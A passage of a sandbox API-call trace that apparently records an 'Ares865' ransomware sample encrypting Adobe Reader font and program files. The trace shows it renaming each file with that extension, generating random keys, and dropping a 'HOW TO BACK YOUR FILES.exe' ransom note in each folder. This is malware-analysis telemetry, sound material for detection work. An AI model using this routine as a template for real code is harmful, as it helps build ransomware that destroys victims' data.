1 [0162.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.964] lstrcpyW (in: lpString1=0x2cce46e, lpString2="V" | out: lpString1="V") returned="V" [0162.964] lstrlenW (lpString="V") returned 1 [0162.964] lstrlenW (lpString="Ares865") returned 7 [0162.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V.Ares865") returned 64 [0162.964] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v.ares865"), dwFlags=0x1) returned 1 [0162.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.966] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3373) returned 1 [0162.966] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.969] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.969] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.969] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.970] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" [0162.970] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont" [0162.970] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0162.970] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\how to back your files.exe"), bFailIfExists=1) returned 0 [0162.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.972] GetLastError () returned 0x0 [0162.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0162.973] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f934f00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54816ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54816ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0162.973] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0162.973] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0162.973] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeFanHeitiStd-Bold.otf" | out: lpString1="AdobeFanHeitiStd-Bold.otf") returned="AdobeFanHeitiStd-Bold.otf" [0162.973] lstrlenW (lpString="AdobeFanHeitiStd-Bold.otf") returned 25 [0162.973] lstrlenW (lpString="Ares865") returned 7 [0162.973] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0162.974] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf.Ares865") returned 91 [0162.974] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf.ares865"), dwFlags=0x1) returned 1 [0162.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeFanHeitiStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobefanheitistd-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5497908) returned 1 [0162.976] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.280] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0163.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0163.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.301] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeGothicStd-Bold.otf" | out: lpString1="AdobeGothicStd-Bold.otf") returned="AdobeGothicStd-Bold.otf" [0163.301] lstrlenW (lpString="AdobeGothicStd-Bold.otf") returned 23 [0163.301] lstrlenW (lpString="Ares865") returned 7 [0163.301] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0163.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeGothicStd-Bold.otf.Ares865") returned 89 [0163.302] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeGothicStd-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobegothicstd-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeGothicStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobegothicstd-bold.otf.ares865"), dwFlags=0x1) returned 1 [0163.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeGothicStd-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobegothicstd-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0163.305] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2885176) returned 1 [0163.305] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0163.306] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0163.306] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.638] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0163.638] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0163.638] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.654] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeHeitiStd-Regular.otf" | out: lpString1="AdobeHeitiStd-Regular.otf") returned="AdobeHeitiStd-Regular.otf" [0163.654] lstrlenW (lpString="AdobeHeitiStd-Regular.otf") returned 25 [0163.654] lstrlenW (lpString="Ares865") returned 7 [0163.654] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0163.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf.Ares865") returned 91 [0163.654] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf.ares865"), dwFlags=0x1) returned 1 [0163.658] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeHeitiStd-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobeheitistd-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0163.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12265424) returned 1 [0163.658] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0163.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0163.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.946] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0163.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0163.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0163.983] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeMingStd-Light.otf" | out: lpString1="AdobeMingStd-Light.otf") returned="AdobeMingStd-Light.otf" [0163.983] lstrlenW (lpString="AdobeMingStd-Light.otf") returned 22 [0163.983] lstrlenW (lpString="Ares865") returned 7 [0163.983] lstrcmpiW (lpString1="ght.otf", lpString2="Ares865") returned 1 [0163.983] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf.Ares865") returned 88 [0163.983] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf.ares865"), dwFlags=0x1) returned 1 [0163.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0163.987] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10171656) returned 1 [0163.987] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0163.988] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0163.988] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.212] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0164.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0164.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.240] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeMyungjoStd-Medium.otf" | out: lpString1="AdobeMyungjoStd-Medium.otf") returned="AdobeMyungjoStd-Medium.otf" [0164.240] lstrlenW (lpString="AdobeMyungjoStd-Medium.otf") returned 26 [0164.240] lstrlenW (lpString="Ares865") returned 7 [0164.240] lstrcmpiW (lpString1="ium.otf", lpString2="Ares865") returned 1 [0164.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf.Ares865") returned 92 [0164.240] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf.ares865"), dwFlags=0x1) returned 1 [0164.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0164.244] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4101108) returned 1 [0164.244] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0164.245] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0164.245] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.456] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0164.457] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0164.457] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.535] lstrcpyW (in: lpString1=0x2cce474, lpString2="AdobeSongStd-Light.otf" | out: lpString1="AdobeSongStd-Light.otf") returned="AdobeSongStd-Light.otf" [0164.536] lstrlenW (lpString="AdobeSongStd-Light.otf") returned 22 [0164.536] lstrlenW (lpString="Ares865") returned 7 [0164.536] lstrcmpiW (lpString1="ght.otf", lpString2="Ares865") returned 1 [0164.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf.Ares865") returned 88 [0164.536] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf.ares865"), dwFlags=0x1) returned 1 [0164.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0164.547] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15586660) returned 1 [0164.547] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0164.548] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0164.548] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.839] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0164.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0164.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0164.858] lstrcpyW (in: lpString1=0x2cce474, lpString2="KozGoPr6N-Medium.otf" | out: lpString1="KozGoPr6N-Medium.otf") returned="KozGoPr6N-Medium.otf" [0164.858] lstrlenW (lpString="KozGoPr6N-Medium.otf") returned 20 [0164.858] lstrlenW (lpString="Ares865") returned 7 [0164.858] lstrcmpiW (lpString1="ium.otf", lpString2="Ares865") returned 1 [0164.858] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf.Ares865") returned 86 [0164.858] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf.ares865"), dwFlags=0x1) returned 1 [0164.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozGoPr6N-Medium.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozgopr6n-medium.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0164.862] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5499164) returned 1 [0164.862] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0164.863] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0164.863] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.093] lstrcpyW (in: lpString1=0x2cce474, lpString2="KozMinPr6N-Regular.otf" | out: lpString1="KozMinPr6N-Regular.otf") returned="KozMinPr6N-Regular.otf" [0165.093] lstrlenW (lpString="KozMinPr6N-Regular.otf") returned 22 [0165.093] lstrlenW (lpString="Ares865") returned 7 [0165.093] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0165.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf.Ares865") returned 88 [0165.094] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf.ares865"), dwFlags=0x1) returned 1 [0165.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8134748) returned 1 [0165.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.299] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" [0165.326] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader" [0165.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0165.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\how to back your files.exe"), bFailIfExists=1) returned 0 [0165.328] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0165.329] GetLastError () returned 0x0 [0165.330] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0165.330] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54816ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54816ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0165.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0165.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0165.330] lstrcpyW (in: lpString1=0x2cce460, lpString2="A3DUtils.dll" | out: lpString1="A3DUtils.dll") returned="A3DUtils.dll" [0165.331] lstrlenW (lpString="A3DUtils.dll") returned 12 [0165.331] lstrlenW (lpString="Ares865") returned 7 [0165.331] lstrcmpiW (lpString1="ils.dll", lpString2="Ares865") returned 1 [0165.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll.Ares865") returned 68 [0165.331] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\a3dutils.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\a3dutils.dll.ares865"), dwFlags=0x1) returned 1 [0165.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 